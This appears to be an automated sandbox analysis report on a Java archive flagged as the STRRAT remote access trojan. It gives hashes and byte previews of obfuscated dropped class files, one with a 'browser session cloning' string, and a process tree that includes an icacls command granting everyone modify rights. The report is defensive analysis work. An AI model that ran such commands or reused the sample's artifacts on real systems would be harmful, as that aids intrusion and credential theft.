                        Entropy (8bit):5.5147793203660225
                        Encrypted:false
                        SSDEEP:6:Fb+s3js/Jq2/s4y1XT2Jq2ciDJq2cJUpFnxaJ2qRPt+NulkXi8BPmlknM50:FbgBy1SCiDxLnxaJtRlnlsLqkM50
                        MD5:B3717A0966B55C963D58164A4552BD5A
                        SHA1:10D338785121EFAAA38F393A3DBD09CE7C192F8E
                        SHA-256:6DE383416A0AB410354A9AF95E4628C74910FDB43916D66071F99DA8E61DB25B
                        SHA-512:C076C579BAF85BA3D4A512A98D1BEDFAFB2B722B86D904C998CCC334EC9A6B74A2EE89FE721F511F43E22BF1DB8552B8B7BEEDE845937674F3836DE17B05EA2A
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/hSQNXYaWyFQzecPOHvVddvqXyqC;)V...<init>...Code..&LcarLambo/hSQNXYaWyFQzecPOHvVddvqXyqC;..$carLambo/hSQNXYaWyFQzecPOHvVddvqXyqC..&carLambo/tjBwnLxfgUZInqAXXJorajaLymNWI...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):428
                        Entropy (8bit):5.425016275750154
                        Encrypted:false
                        SSDEEP:12:yC8EiMBMOPy1G/MOp8S0FnxaJb13SRF+8Kjd6VDloFU9d5t:8Iy1GyZQGz+8e0V5vDt
                        MD5:BB44519675953DDC6257E8286E37D132
                        SHA1:E6B07D6A754C2062BD57C9D0883A029DDEC1C519
                        SHA-256:1A3C0CA55754B9FD70CD2590F421A1D4FD2BD02F7A0D4C9E19F6F58F41E66389
                        SHA-512:CF0016463C16B182267736FB9BF646B87AD6FF58E30458024BBFA8CEA70F1CD801E603786F948CA17CE13D9486ACAF858322E1F7AC780C3950C46B6C0F6F1879
                        Malicious:false
                        Preview:.......4............................................................()V..&(Ljava/lang/String;)Ljava/lang/String;...<clinit>...<init>...Code...Ljava/lang/String;..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...gQEuyVcYntwPXTysEtfquh...getProperty...java/lang/Object...java/lang/System...nnHRYoAONroTDXAkGOnAtRE...os.name...user.name.1................................................*.....................................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):600
                        Entropy (8bit):5.73729789696941
                        Encrypted:false
                        SSDEEP:12:7LjnyMjQBjs/MJavFWDxRJHQjdjojD5tnxaJtRloxhAZKHMZ:7Pn/GDadWDDJwjd0XQHzo8ZIW
                        MD5:E5D40DF25C00E2411F3AA3F4B20D866A
                        SHA1:333744DFEFF8612687722489B894C669A9190E22
                        SHA-256:CECACE8FD41A73BD3F33601324C7E2747B8A2F23643A458B5E6848777D68F216
                        SHA-512:FDEAB4C9638511B5F5F8DD4FFA64C48B63FDB2F02182B89079883621E8701E676C4CC2B9E735E21D4344DF3AFF69161A178E26745B7693874215566AF47DCC96
                        Malicious:false
                        Preview:.......4............................................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..6(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/lang/String;)V...<init>..lBrowser session cloning started. This will take a long time to complete..You will be notified when complete....Code..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..!carLambo/uBLIKHEHpAoUHpElmhtbDhNa...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*........*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):422
                        Entropy (8bit):5.562468134959159
                        Encrypted:false
                        SSDEEP:12:svR2s/ey1+/y/esfrtnxaJtRloplsYuPkM50:SR2sGy1+qWKQHzoL1FM50
                        MD5:F3E135F1910FE1660A03C1590D17E15D
                        SHA1:62B14CE3A6C6DF3AD2794AEEBD950D5FE68AC3C4
                        SHA-256:ABD7011E11296DD0882ED642750D43A05CC6306D3800C4CB3660B741972880E8
                        SHA-512:E030A45482E9C32262A150D8BE837D659BEFB05903DC7FAF1C6305BE5BB0F18C80B9C8E058CC15604E05ADE03B4B20E72C5A6ECBED922CFF217DFBE908BA7734
                        Malicious:false
                        Preview:.......4...............................................()V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...<init>...Code..%LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;..#carLambo/tXuEElkzfqlTWetjTVgwULpwLk..!carLambo/vDWajJBFzMIEOyWGpkkOlvNI...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):487
                        Entropy (8bit):5.664142137945078
                        Encrypted:false
                        SSDEEP:12:HKk2ydhMJy1bdrP6/MORdNdAQQnxaJtRloplPqHujdylVi:x/gy1Jb6LNWQqQHzoLiOhyi
                        MD5:B1FAC1B632BE3E543FB935B9BBCDB476
                        SHA1:58CDBCE2757C3D8686BBCD127AC905AA87ADF0B9
                        SHA-256:10F3EB1AA0D853FF0B55F39E8A76482C7E01D796DEE12F37D863F1E1FDCED250
                        SHA-512:0F8DB0DFDBC2F26677C51E1558688B287A59148A146378C50C53E9BFDF04526AF24420EAA2299CD687FEF3C89078E8CD60E257485DB3E064576454906A37B0C0
                        Malicious:false
                        Preview:.......4.........................................................()V..;(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;Ljava/lang/String;)V...<init>...Code..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;...Ljava/lang/String;..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...carLambo/vGKYEHoGOVkVVIDgxIUt...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..................................................*+...*,...*..............................*...*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1638
                        Entropy (8bit):5.757476052425222
                        Encrypted:false
                        SSDEEP:48:kGQyYNtdzjH4L9kEqlfEQQvz5Dp0M87XMtiv:kGmNtJjhayXE8
                        MD5:964A549172E4957D1DA19F2EE668E316
                        SHA1:9C315B92A8F92E64F1E4BE3E6ADD58955DCFEC73
                        SHA-256:F68D1CEA87F54CF89EBB4B23CA598750F3FAD5F94A6E145987091EB00C6436DE
                        SHA-512:3B5537B1E285008B89A6DBF595FC7B31EE04F748D647473685569ABDBE07BA8B64807FA97EBF18D275ECB563658C65B418B0351B37F8B53350E53335E10717D8
                        Malicious:false
                        Preview:.......4.e..]..d..J..K..L..M..R..S..T..U..V..W..X..Y..Z....(....+....3....4....6....'........./....1....2....'....&....*....,....%....%....)....7....-....0....5..@.;..@.<..@.?..H.B..I.>..N.;..O.D..P.9..Q.=..[.8..[.?..\.:..^.;.._.;.._.F..`.C..a.;..b.E..c.8...()Ljava/lang/String;..!()Ljava/nio/channels/FileChannel;...()Ljava/nio/channels/FileLock;...()V...(Ljava/io/File;)V..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<init>...Code..(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;...Ljava/io/File;...Ljava/io/FileOutputStream;...Ljava/lang/String;...Ljava/nio/channels/FileLock;...StackMapTable...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT.. carLambo/GYDTPVEwzYqRTvxmvHtRLJG..&carLambo/iytiDwrcScnkWxsldKZwufPjSLiFk..$carLambo/wvGnyIgrUOTdXfGRPmvbIDXjmea...close...gQEuyVcYntwPXTysEtfquh...getChannel...getProperty...java/io/File...java/io/FileOutputStream...java/lang/Exception...java/lang/Object...java
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):481
                        Entropy (8bit):5.643347396916603
                        Encrypted:false
                        SSDEEP:12:sn61AkdPHTlYlnxaJ8EoRVwOzXpOwlD66W6xPDPAe:+61A6HTlMQSPwuxJ6wxPDH
                        MD5:C8AF181A23986A8149181D97F6B417B5
                        SHA1:8C975DD86A6EDD44379360720CCCC268DFFE0B27
                        SHA-256:80861756465C9CC63A0246744A11BB746F3EAF91AFEFADC1087AF401D7645BE1
                        SHA-512:3BECCD4ECDF479A6BBC14CC5F99E4F188EEDADCB0B87107D38683EF31E1694E89F029F7BD9C6626F81AF03B51A32BD853862C57F9AD02EB96B88B10D5969C099
                        Malicious:false
                        Preview:.......4...................................................................()V...()[I...<clinit>...Code...I...StackMapTable...[I...carLambo/qQnenommQRmzAInlnTAeg...carLambo/xjzwOiTLTjfoGTzdLznhC...gQEuyVcYntwPXTysEtfquh...java/lang/NoSuchFieldError...java/lang/Object...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...values$258dc6c5.0...............................l.......2................d.O...W.......d.O...W.......d.O.W..............!.$...%./.0............V....L....J.....
                        File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                        Entropy (8bit):7.914309490947633
                        TrID:
                        • Java Archive (13504/1) 62.80%
                        • ZIP compressed archive (8000/1) 37.20%
                        File name:MVO4879773357878.jar
                        File size:112'050 bytes
                        MD5:ee75fce2158c3587daa560419f122001
                        SHA1:760d09adceeb4903db4130ef0d28654915844d5d
                        SHA256:88a9b4cfac5ba3a433942f8f4e489229f0fd694a7f9a78a8b6ca5cc5dc590e00
                        SHA512:c1a4ce9bf70ced9adee8f2955573e65777bc3e4151dacca076502cbd8cb8af9ceb5735cfed73e2bb9d8617961a3862ef94f440d25ab9f948407705b1a88d4229
                        SSDEEP:3072:QOOwYuveeNu/6Xy8HZknOZ6Xdbx9kkTrxZKXZnmVOEvIT:KwdveeoiXy8Cny6Nbx9nrxZKJtEvS
                        TLSH:63B3CF2EAECFC6B0D04B82728425A167AB5D41B9E143A50F69FD34454E32DBC4B17ACF
                        File Content Preview:PK.........ctX................META-INF/MANIFEST.MF..OK.0....|.9.ab.....Z.d]........4.I....{....s........9...I.h.....g;.E...v...........Vx5..7.x^mJ...N..Z...a..R........RW.5.,.1..;._p%......#\..........3...Wk..^.6s..q...a......ec..X...........Lx3...@Ji.4%?
                        Icon Hash:d08c8e8ea2868a54
                        No network behavior found


                        Target ID:0
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\7za.exe
                        Wow64 process (32bit):true
                        Commandline:7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar"
                        Imagebase:0x500000
                        File size:289'792 bytes
                        MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        Wow64 process (32bit):true
                        Commandline:java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun
                        Imagebase:0x680000
                        File size:257'664 bytes
                        MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Target ID:3
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:4
                        Start time:13:58:27
                        Start date:29/03/2024
                        Path:C:\Windows\SysWOW64\icacls.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                        Imagebase:0xc30000
                        File size:29'696 bytes
                        MD5 hash:2E49585E4E08565F52090B144062F97E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:5
                        Start time:13:58:27
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true
